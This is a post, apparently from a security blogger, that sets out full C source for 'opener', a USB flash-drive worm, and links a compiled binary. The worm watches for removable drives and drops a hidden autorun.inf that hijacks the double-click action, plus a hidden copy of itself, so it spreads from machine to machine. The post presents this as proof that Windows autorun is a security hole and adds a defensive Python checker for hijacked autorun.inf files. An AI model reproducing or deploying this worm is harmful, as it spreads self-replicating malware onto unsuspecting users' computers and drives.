Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk, and you can always rely on Microsoft to make the potential an actual. Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove, should it? Fair enough, here's some code:
#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <string.h>

/* The autorun.inf written to each drive. It defines a custom "eject" verb whose
   command is opener.exe and then makes that verb the default, so double-clicking
   the drive in My Computer runs opener.exe instead of simply opening the folder. */
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

void closing()
{
    if (hmutex)
        ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                       HINSTANCE hPrevInstance,
                       LPTSTR lpCmdLine,
                       int nCmdShow)
{
    UNREFERENCED_PARAMETER(hPrevInstance);
    UNREFERENCED_PARAMETER(lpCmdLine);

    /* Find our own path; only carry on if it is a plain "X:\..." path. */
    WCHAR myfile[1024];
    GetModuleFileName(NULL, myfile, 1024);
    if (myfile[1] != L':')
        return 1;

    /* Open an Explorer window for the drive we were launched from, so the user
       still sees the folder view they expected from the double-click. */
    WCHAR cmd[1024];
    wsprintf(cmd, L"explorer %c:\\", myfile[0]);
    STARTUPINFOW si;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    PROCESS_INFORMATION po;
    memset(&po, 0, sizeof(po));
    CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);

    /* Single-instance guard. CreateMutex returns NULL on failure (not
       INVALID_HANDLE_VALUE) and sets ERROR_ALREADY_EXISTS if a copy is already running. */
    hmutex = CreateMutex(NULL, TRUE, L"Opener");
    if (hmutex == NULL)
        return 1;
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        CloseHandle(hmutex);
        return 1;
    }
    atexit(closing);

    /* Read our own executable into memory so it can be copied to other drives.
       CreateFile returns INVALID_HANDLE_VALUE on failure, not NULL. */
    HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hmyfile == INVALID_HANDLE_VALUE)
        return 1;
    DWORD szhigh = 0;
    DWORD szlow = GetFileSize(hmyfile, &szhigh);
    if (szhigh != 0) {            /* refuse anything over 4 GB; szhigh is 0 from here on */
        CloseHandle(hmyfile);
        return 1;
    }
    void *myfilemem = malloc(szlow);
    if (myfilemem == NULL) {
        CloseHandle(hmyfile);
        return 1;
    }
    DWORD nread;
    ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
    CloseHandle(hmyfile);

    /* Once a minute, look for removable drives that contain data and have no
       autorun.inf yet, and drop a hidden autorun.inf plus a hidden copy of ourselves. */
    while (1) {
        DWORD mask = GetLogicalDrives();
        for (int i = 0; i < 26; i++) {
            if (!(mask & (1 << i)))
                continue;
            WCHAR path[100];
            path[0] = L'A' + i;
            path[1] = L':';
            path[2] = L'\\';
            path[3] = 0;
            if (GetDriveType(path) != DRIVE_REMOVABLE)
                continue;
            /* nfc < tnc means at least one cluster is in use, i.e. the drive isn't empty */
            DWORD spc, bps, nfc, tnc;
            if (!GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc) || nfc >= tnc)
                continue;
            wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
            if (GetFileAttributes(path) != INVALID_FILE_ATTRIBUTES)
                continue;         /* the drive already has an autorun.inf */
            HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
            if (h == INVALID_HANDLE_VALUE)
                continue;
            DWORD written;
            WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
            CloseHandle(h);
            wsprintf(path, L"%c:\\opener.exe", L'A' + i);
            h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
            if (h != INVALID_HANDLE_VALUE) {
                WriteFile(h, myfilemem, szlow, &written, NULL);
                CloseHandle(h);
            } else {
                /* couldn't copy the executable, so don't leave a dangling autorun.inf behind */
                wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
                DeleteFile(path);
            }
        }
        Sleep(1000 * 60);
    }
    return 0;
}
Download: opener.cpp, and here it is compiled: opener.exe.

How does it work? It's really quite simple:
So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected: a hidden autorun.inf and a hidden opener.exe appear in its root. Remove the drive, use Task Manager to kill opener.exe, and now plug the drive back in.

If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change: it won't pop up now. You may have had this experience before; it's kinda random when Windows will and won't pop up that box. No matter, go to My Computer as you typically would and double-click on the drive, as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options, then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again. And so the cycle continues.

Dear Microsoft, please fix, thanks.

QuantumG
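As an added example (not code from the original post), here is a defender-side check for the trick the autorun.inf above relies on: it parses an autorun.inf and reports when the default double-click verb has been redirected to a command on the drive, or when an open/shellexecute key would launch a program on insertion. The sample input is constructed from the autorun.inf that opener writes; the function names are my own.

```python
# Added example, not code from the original post: parse an autorun.inf and
# report settings that turn "open the drive" into "run a program from the drive".
from typing import Dict, List

# Constructed sample: the autorun.inf the post's opener writes to a flash drive.
SAMPLE_AUTORUN = ("[autorun]\r\nshell\\eject=Eject\r\n"
                  "shell\\eject\\command=opener.exe\r\nshell=eject\r\n")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section as a lowercased key -> value mapping.

    INF keys are case-insensitive and ';' starts a comment; other sections are ignored.
    """
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def find_hijacked_default_action(entries: Dict[str, str]) -> List[str]:
    """Describe settings that make a double-click or AutoRun launch a program."""
    findings: List[str] = []
    # 'shell=<verb>' makes <verb> the default action; its command lives under
    # shell\<verb>\command, so a double-click runs that instead of opening the folder.
    verb = entries.get("shell", "").lower()
    command = entries.get(f"shell\\{verb}\\command") if verb else None
    if command:
        findings.append(f"default action redirected to verb '{verb}' running '{command}'")
    # 'open' and 'shellexecute' launch a program directly when AutoRun fires.
    for key in ("open", "shellexecute"):
        if key in entries:
            findings.append(f"'{key}' launches '{entries[key]}' on AutoRun")
    return findings


if __name__ == "__main__":
    for finding in find_hijacked_default_action(parse_autorun(SAMPLE_AUTORUN)):
        print("autorun.inf:", finding)
```

A clean autorun.inf that only sets an icon or label produces no findings, so the check can be run over every removable drive's root without noise.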